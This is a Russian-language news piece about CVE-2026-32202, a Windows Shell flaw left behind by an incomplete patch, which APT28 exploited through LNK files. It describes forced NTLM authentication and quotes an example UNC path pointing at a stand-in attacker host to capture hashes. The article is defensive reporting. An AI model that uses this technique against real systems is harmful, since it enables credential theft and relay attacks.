Если файл ссылается на UNC-путь вроде
\\attacker.com\share\payload.cpl, Windows инициирует SMB-соединение и отправляет хеш NTLM без ведома пользователя. Атакующий перехватывает его для relay-атаки или офлайн-подбора пароля.
«Microsoft закрыла оригинальное RCE (CVE-2026-21510), но уязвимость принудительной аутентификации (CVE-2026-32202) осталась, — пояснил Дахан. — Система начинает аутентификацию до проверки доверия к серверу, что позволяет эксплуатировать LNK-файлы без участия жертвы».
Это спуфинг: злоумышленник маскирует вредоносный объект под доверенный. Формально требуется запуск файла, но APT28 автоматически обрабатывает LNK — кража происходит без действий пользователя.
После запуска атакующий получает часть конфиденциальных данных, но не может их изменить или ограничить доступ. Microsoft скорректировала бюллетень 27 апреля 2026 года, исправив неверные индексы эксплуатируемости и вектор CVSS.
В ежемесячном обновлении исправлена CVE-2026-32202 (CVSS 4,3) в Windows Shell. По данным Akamai, уязвимость возникла из-за неполного февральского патча для CVE-2026-21510.
Технически атака опиралась на разбор пространства имён Shell. Хакеры APT28 загружали DLL с удалённого сервера как CPL-объект, минуя проверки. Февральский патч ввёл проверку SmartScreen, но аутентификация осталась прежней.
Дахан обнаружил проблему и сообщил Microsoft. APT28 (Fancy Bear и др.) использовала эту уязвимость вместе с CVE-2026-21513 (CVSS 8,8) в MSHTML Framework. Обе ошибки позволяли обойти сетевую безопасность. Akamai зафиксировала эксплуатацию CVE-2026-21513 месяцем ранее.
0 комментариев